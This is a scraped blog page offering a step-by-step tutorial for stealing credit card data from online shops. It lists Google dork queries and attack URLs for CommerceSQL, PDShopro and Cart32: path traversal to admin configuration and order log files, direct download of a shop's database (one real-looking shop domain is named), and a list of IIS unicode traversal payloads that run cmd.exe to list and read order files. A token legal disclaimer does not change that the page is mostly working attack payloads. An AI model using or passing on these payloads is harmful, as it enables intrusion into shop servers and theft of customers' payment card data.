techian.com

Deprecated: Function split() is deprecated in /home/techian/public_html/wp-content/plugins/yet-another-related-posts-plugin/magic.php on line 304

Hacking credit cards is a very easy job. all you need is a pc and a vulnerable shop site

Warning: This tutorial is only meant for learning process. iplementing the method may land you behind bars. so better stay away from these activities.

E-Commerce

1. Find target Website commerceSQL at google.com, with keyword :

allinurl:/commercesql/

2. For example we get target with url :

http://www.example.com/commercesql/blablabla

3. Replace the URL to be :

-> www.example.com/cgi-bin/commercesql/index.cgi?page=

4. Example to see admin config

-> www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

5. Example to see admin manager

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

6. To see file log/ccnya ->

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. Done

PDShopro

1. Find target Website PDshopro at google.com, with keyword allinurl:/shop/category.asp/
catid=

2. First we have to watch the database configuration by replacing the URL to be: www.example.com/admin/dbsetup.asp

3. Target example : http://www.marktwainbooks.com/admin/dbsetup.asp

4. We will get the name of databese : sdatapdshoppro.mdb

5. Now to download sdatapdshoppro.mdb file, you can replace the URL to be : http:// www.marktwainbooks.com/data/pdshoppro.mdb

6. Open file .mdb- using Microsoft Access

7. Good luck !

Cart32

1. Find target at www.google.com with keyword allinurl:/cart32.exe/

2. For example we have target with url:
http://www.example.com/scripts/cart32.exe/blablabla

3. Replace that url to be -> http://www.example.com/scripts/

4. Modify that url with unicode at the end -> http://www.example.com/scripts/

5. example unicode for path /scripts/ : –>

/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:

For path path /cgi-bin/ ->
/cgi-bin/............winntsystem32cmd.exe?/c+dir+c:
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:

6. for example, at that url using path /scripts/ than relace to be http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:

7. End string unicode with dir+c: It means we are on the directory c server target!

8. For enter to the directory replace cc’s unicode with -> http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:progra~1mwainccart32

9. We will get ouput and listing form.32 file’w, for example :WRBURNS-001065.c32

10. For viewing the file with unicode http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:progra~1mwainccart32WRBURNS-001065.c32

11. If it doesn’t work, you have to try with another unicode.

I would also like to share :

1. Ultimate Hacking Experience 2008 Including Tutorial
2. One of the easiest method of WEBSITE HACKING
3. R.F.I. Rooting Tutorial
4. Thayet Myo Hacking Day!” virus/trojan, then \system32\hal.dll missing
5. Local File Inclusion Tutorial